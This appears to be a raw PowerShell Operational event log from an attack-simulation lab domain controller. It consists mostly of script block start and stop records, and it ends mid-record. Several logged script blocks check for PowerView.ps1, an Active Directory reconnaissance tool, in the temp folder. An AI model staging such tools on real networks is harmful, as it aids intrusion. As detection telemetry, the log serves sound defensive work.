Runspace ID: 976e0607-9d72-49d1-be38-78f9d6c7fe08
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478227
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1}}

ScriptBlock ID: c4d417b6-9588-44fe-b617-23cb91cf40a5
Path:
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478226
Keywords=None
Message=Started invocation of ScriptBlock ID: 81caadf3-9d1d-4005-ba58-ff7a1c30b7e9
Runspace ID: 976e0607-9d72-49d1-be38-78f9d6c7fe08
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478225
Keywords=None
Message=Creating Scriptblock text (1 of 1):
& {if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1}}

ScriptBlock ID: 81caadf3-9d1d-4005-ba58-ff7a1c30b7e9
Path:
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1478224
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1478223
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 6628 in AppDomain: DefaultAppDomain.
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1478222
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478221
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478220
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478219
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478218
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478217
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478216
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478215
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478214
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478213
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478212
Keywords=None
Message=Completed invocation of ScriptBlock ID: 93d779ef-941d-4e00-98f9-278cc93e6e44
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478211
Keywords=None
Message=Started invocation of ScriptBlock ID: 93d779ef-941d-4e00-98f9-278cc93e6e44
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478210
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478209
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478208
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4ccf8614-5388-4599-8b4a-25a5522f098f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478207
Keywords=None
Message=Completed invocation of ScriptBlock ID: 378d3c9c-7e66-4752-aa62-9136843a5efd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478206
Keywords=None
Message=Started invocation of ScriptBlock ID: 378d3c9c-7e66-4752-aa62-9136843a5efd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478205
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3e25f239-fa3d-49da-8dce-f103d67bd1b5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478204
Keywords=None
Message=Started invocation of ScriptBlock ID: 3e25f239-fa3d-49da-8dce-f103d67bd1b5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478203
Keywords=None
Message=Completed invocation of ScriptBlock ID: d9432ec7-1113-4c2e-8d79-d8f910249f08
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478202
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478201
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478200
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478199
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478198
Keywords=None
Message=Started invocation of ScriptBlock ID: d9432ec7-1113-4c2e-8d79-d8f910249f08
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478197
Keywords=None
Message=Started invocation of ScriptBlock ID: 4ccf8614-5388-4599-8b4a-25a5522f098f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478196
Keywords=None
Message=Completed invocation of ScriptBlock ID: 892cd5a7-1ed1-45c5-b2dd-9883bf181058
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478195
Keywords=None
Message=Started invocation of ScriptBlock ID: 892cd5a7-1ed1-45c5-b2dd-9883bf181058
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478194
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4ccf8614-5388-4599-8b4a-25a5522f098f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478193
Keywords=None
Message=Completed invocation of ScriptBlock ID: 378d3c9c-7e66-4752-aa62-9136843a5efd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478192
Keywords=None
Message=Started invocation of ScriptBlock ID: 378d3c9c-7e66-4752-aa62-9136843a5efd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478191
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.OriginInfo }

ScriptBlock ID: 378d3c9c-7e66-4752-aa62-9136843a5efd
Path:
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478190
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3e25f239-fa3d-49da-8dce-f103d67bd1b5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478189
Keywords=None
Message=Started invocation of ScriptBlock ID: 3e25f239-fa3d-49da-8dce-f103d67bd1b5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478188
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.ErrorCategory_Message }

ScriptBlock ID: 3e25f239-fa3d-49da-8dce-f103d67bd1b5
Path:
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478187
Keywords=None
Message=Completed invocation of ScriptBlock ID: d9432ec7-1113-4c2e-8d79-d8f910249f08
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478186
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478185
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478184
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478183
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478182
Keywords=None
Message=Started invocation of ScriptBlock ID: d9432ec7-1113-4c2e-8d79-d8f910249f08
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478181
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.PSMessageDetails }

ScriptBlock ID: d9432ec7-1113-4c2e-8d79-d8f910249f08
Path:
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478180
Keywords=None
Message=Started invocation of ScriptBlock ID: 4ccf8614-5388-4599-8b4a-25a5522f098f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478179
Keywords=None
Message=Completed invocation of ScriptBlock ID: 892cd5a7-1ed1-45c5-b2dd-9883bf181058
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478178
Keywords=None
Message=Started invocation of ScriptBlock ID: 892cd5a7-1ed1-45c5-b2dd-9883bf181058
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478177
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478176
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478175
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478174
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478173
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
